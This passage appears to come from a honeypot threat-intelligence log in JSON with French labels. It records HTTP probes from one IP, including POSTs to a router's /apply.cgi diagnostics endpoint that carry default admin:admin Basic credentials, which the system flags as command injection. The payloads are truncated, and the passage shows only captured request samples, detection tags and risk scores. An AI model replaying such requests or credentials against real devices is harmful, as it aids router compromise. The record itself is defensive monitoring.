\u0022classification_reason\u0022: \u0022Sonde HTTP (tag sap-sapcontrol-path) \u00b7 confiance 77%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Sonde HTTP (tag sap-sapcontrol-path) \u00b7 confiance 77%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u00b7 risque 40\/100\u0022, \u0022confidence_pct\u0022: 77, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 20.0, \u0022classification\u0022: 38.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 15.0, \u0022risk_score\u0022: 40}, \u0022attack_stage\u0022: \u0022probe\u0022, \u0022attack_stage_label\u0022: \u0022Sonde \/ probe\u0022, \u0022attack_chain_stage\u0022: \u0022discovery\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022D\u00e9couverte\u0022, \u0022risk_score\u0022: 40, \u0022risk_label\u0022: \u0022Moyen\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 82, \u0022protocol_emulated\u0022: null, \u0022tags_summary\u0022: null, \u0022tags_summary_labels_fr\u0022: null, \u0022recommended_action\u0022: \u0022monitor\u0022, \u0022recommended_action_label\u0022: \u0022Surveiller\u0022, \u0022mitre\u0022: \u0022TA0007\u0022, \u0022mitre_technique\u0022: \u0022TA0007\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/\u0022, \u0022request_line\u0022: \u0022GET \/ HTTP\/1.1\u0022, \u0022port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022Sonde HTTP \u00b7 via HTTP:82 \u00b7 (sonde \/ probe)\u0022, \u0022evidence_snippet\u0022: \u0022GET \/ HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nConnection: close\u0022, \u0022target_port_label\u0022: \u002282 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 77 % \u2014 Score WAF 20 \u00b7 1 tag(s) WAF\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 77 % \u2014 Score WAF 20 \u00b7 1 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022discovery\u0022, \u0022label_fr\u0022: \u0022D\u00e9couverte\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u002282\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022discovery\u0022, \u0022matched_patterns\u0022: [], \u0022ban_policy\u0022: \u0022advisory_monitor\u0022, \u0022tags_list\u0022: [\u0022950734:sap-sapcontrol-path\u0022, \u0022http_auth_header_token\u0022, \u0022http_basic_auth\u0022, \u0022http_no_ua\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:82","http_user_agent":null,"http_referer":null,"tags":"[\u0022950734:sap-sapcontrol-path\u0022, \u0022http_auth_header_token\u0022, \u0022http_basic_auth\u0022, \u0022http_no_ua\u0022]","anomalies":"[]","severity":4,"bytes_in":97},{"id":11809351,"ip":"45.153.34.219","ts":"2026-07-14 02:18:12.000000","proto":"tcp","src_port":55170,"dst_port":82,"service":"http","classification":"cmd_injection","waf_score":34,"waf_tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022]","http_method":"POST","http_target":"\/apply.cgi","sensor_id":"paris-1","meta":"{\u0022http_header_count\u0022: 5, \u0022http_query_params\u0022: 0, \u0022http_path_depth\u0022: 1, \u0022http_path_ext\u0022: \u0022cgi\u0022, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u0022b00c56701bd04898edc8a488547d32d613363649\u0022, \u0022http_target_hash\u0022: \u002231402cc48ac7ac052e1d50fc94349665a12c2c45\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022POST\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 527, \u0022payload_entropy\u0022: 5.369080573864659, \u0022port_category\u0022: \u0022well_known\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 82, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 85.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 35.0, \u0022risk_novelty\u0022: 25.0, \u0022risk_boost\u0022: 15, \u0022risk_granularity\u0022: 6.2, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 25.0}, \u0022risk_score\u0022: 81, \u0022tag_count\u0022: 11, \u0022anomaly_count\u0022: 0, \u0022campaign_key\u0022: \u00224a83991c6cb900d0fb00b4b6aafa98c9742d42ef\u0022, \u0022event_fingerprint\u0022: \u00226b2c5ff3085684c662d172d85fc6520b04bcf832\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022confidence\u0022: 1.0, \u0022classification_confidence\u0022: 1.0, \u0022precision_score\u0022: 142, \u0022precision_signals\u0022: [\u0022INT-http_cmdi\u0022, \u0022pat-0146\u0022], \u0022kb_rule_ids\u0022: [\u0022INT-http_cmdi\u0022, \u0022pat-0146\u0022], \u0022matched_patterns\u0022: [\u0022pat-0842\u0022, \u0022pat-0463\u0022, \u0022pat-0146\u0022], \u0022matched_pattern_names\u0022: [\u0022CRS 921130 duplicate CL\u0022, \u0022Cred Basic auth spray\u0022, \u0022CRS 932205\u0022], \u0022pattern_ids\u0022: [\u0022pat-0842\u0022, \u0022pat-0463\u0022, \u0022pat-0146\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 81}, \u0022named_classification_skipped\u0022: false, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 100.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u00226b857250f07b7cd4b57e54792e4004ab\u0022, \u0022path_pattern_hash\u0022: \u0022b3e1dfd605a877958cebee595444f5d1\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 81}, \u0022payload_preview\u0022: \u0022POST \/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nContent-Type: application\/x-www-form-urlen\u0022, \u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/apply.cgi\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/apply.cgi HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 350\\r\\nConnection: close\\r\\n\\r\\nsubmit_button=Diagnostics\u0026change_action=gozila_cgi\u0026submit_type=start_ping\u0026actio\u0022, \u0022payload_snippet\u0022: \u0022POST \/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nContent-Type: application\/x-www-form-urlen\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/apply.cgi\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/apply.cgi HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 350\\r\\nConnection: close\\r\\n\\r\\nsubmit_button=Diagnostics\u0026change_action=gozila_cgi\u0026submit_type=start_ping\u0026actio\u0022, \u0022payload_snippet\u0022: \u0022POST \/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nContent-Type: application\/x-www-form-urlen\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre_techniques\u0022: [\u0022T1059\u0022, \u0022T1190\u0022], \u0022mitre\u0022: \u0022T1059\u0022, \u0022threat_family\u0022: [\u0022rce_probe\u0022, \u0022ssrf_probe\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u0022a3ab31f178a16e8d89613a5afdcc8a1a2fc70e04\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/apply.cgi\u0022, \u0022request_line\u0022: \u0022POST \/apply.cgi HTTP\/1.1\u0022, \u0022port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022POST \/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nContent-Type: application\/x-www-form-urlen\u0022, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:82 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/apply.cgi\u0022, \u0022target_port_label\u0022: \u002282 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 81\/100 (\u00c9lev\u00e9) \u2014 MITRE T1059 \u2014 confiance 100 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 100, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 81}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 81, \u0022risk_label\u0022: \u0022\u00c9lev\u00e9\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 82, \u0022protocol_emulated\u0022: null, \u0022tags_summary\u0022: [\u0022INT-http_cmdi\u0022, \u0022pat-0146\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022Http Cmdi\u0022, \u0022pat-0146\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022T1059\u0022, \u0022mitre_technique\u0022: \u0022T1059\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/apply.cgi\u0022, \u0022request_line\u0022: \u0022POST \/apply.cgi HTTP\/1.1\u0022, \u0022port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:82 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/apply.cgi\u0022, \u0022evidence_snippet\u0022: \u0022POST \/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nContent-Type: application\/x-www-form-urlen\u0022, \u0022target_port_label\u0022: \u002282 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 100 % \u2014 Score WAF 100 \u00b7 5 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u002282\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_auth_header_token\u0022, \u0022http_basic_auth\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_ssrf_body\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:82","http_user_agent":null,"http_referer":null,"tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_auth_header_token\u0022, \u0022http_basic_auth\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_ssrf_body\u0022]","anomalies":"[]","severity":10,"bytes_in":527},{"id":11809352,"ip":"45.153.34.219","ts":"2026-07-14 02:18:12.000000","proto":"tcp","src_port":55184,"dst_port":82,"service":"http","classification":"cmd_injection","waf_score":34,"waf_tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022]","http_method":"POST","http_target":"\/apply.cgi","sensor_id":"paris-1","meta":"{\u0022http_header_count\u0022: 5, \u0022http_query_params\u0022: 0, \u0022http_path_depth\u0022: 1, \u0022http_path_ext\u0022: \u0022cgi\u0022, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u0022b00c56701bd04898edc8a488547d32d613363649\u0022, \u0022http_target_hash\u0022: \u002231402cc48ac7ac052e1d50fc94349665a12c2c45\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022POST\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 511, \u0022payload_entropy\u0022: 5.369987788958667, \u0022port_category\u0022: \u0022well_known\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 82, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 85.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 35.0, \u0022risk_novelty\u0022: 25.0, \u0022risk_boost\u0022: 15, \u0022risk_granularity\u0022: 6.2, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 25.0}, \u0022risk_score\u0022: 81, \u0022tag_count\u0022: 11, \u0022anomaly_count\u0022: 0, \u0022campaign_key\u0022: \u00224a83991c6cb900d0fb00b4b6aafa98c9742d42ef\u0022, \u0022event_fingerprint\u0022: \u00226b2c5ff3085684c662d172d85fc6520b04bcf832\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022confidence\u0022: 1.0, \u0022classification_confidence\u0022: 1.0, \u0022precision_score\u0022: 142, \u0022precision_signals\u0022: [\u0022INT-http_cmdi\u0022, \u0022pat-0146\u0022], \u0022kb_rule_ids\u0022: [\u0022INT-http_cmdi\u0022, \u0022pat-0146\u0022], \u0022matched_patterns\u0022: [\u0022pat-0842\u0022, \u0022pat-0463\u0022, \u0022pat-0146\u0022], \u0022matched_pattern_names\u0022: [\u0022CRS 921130 duplicate CL\u0022, \u0022Cred Basic auth spray\u0022, \u0022CRS 932205\u0022], \u0022pattern_ids\u0022: [\u0022pat-0842\u0022, \u0022pat-0463\u0022, \u0022pat-0146\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 81}, \u0022named_classification_skipped\u0022: false, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 100.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u0022e5930ce8b37b9f303e8bec2ab204e25b\u0022, \u0022path_pattern_hash\u0022: \u0022b3e1dfd605a877958cebee595444f5d1\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 81}, \u0022payload_preview\u0022: \u0022POST \/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nContent-Type: application\/x-www-form-urlen\u0022, \u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/apply.cgi\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/apply.cgi HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 334\\r\\nConnection: close\\r\\n\\r\\nchange_action=\u0026submit_button=Basic\u0026action=\u0026commit=0\u0026wan_ip=10.0.0.1\u0026wan_mask=25\u0022, \u0022payload_snippet\u0022: \u0022POST \/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nContent-Type: application\/x-www-form-urlen\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/apply.cgi\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/apply.cgi HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 334\\r\\nConnection: close\\r\\n\\r\\nchange_action=\u0026submit_button=Basic\u0026action=\u0026commit=0\u0026wan_ip=10.0.0.1\u0026wan_mask=25\u0022, \u0022payload_snippet\u0022: \u0022POST \/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nContent-Type: application\/x-www-form-urlen\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre_techniques\u0022: [\u0022T1059\u0022, \u0022T1190\u0022], \u0022mitre\u0022: \u0022T1059\u0022, \u0022threat_family\u0022: [\u0022rce_probe\u0022, \u0022ssrf_probe\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u00228c67e1f60e15703c33ad938478d0f003d7d9973e\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/apply.cgi\u0022, \u0022request_line\u0022: \u0022POST \/apply.cgi HTTP\/1.1\u0022, \u0022port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022POST \/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nContent-Type: application\/x-www-form-urlen\u0022, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:82 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/apply.cgi\u0022, \u0022target_port_label\u0022: \u002282 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 81\/100 (\u00c9lev\u00e9) \u2014 MITRE T1059 \u2014 confiance 100 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 100, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 81}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 81, 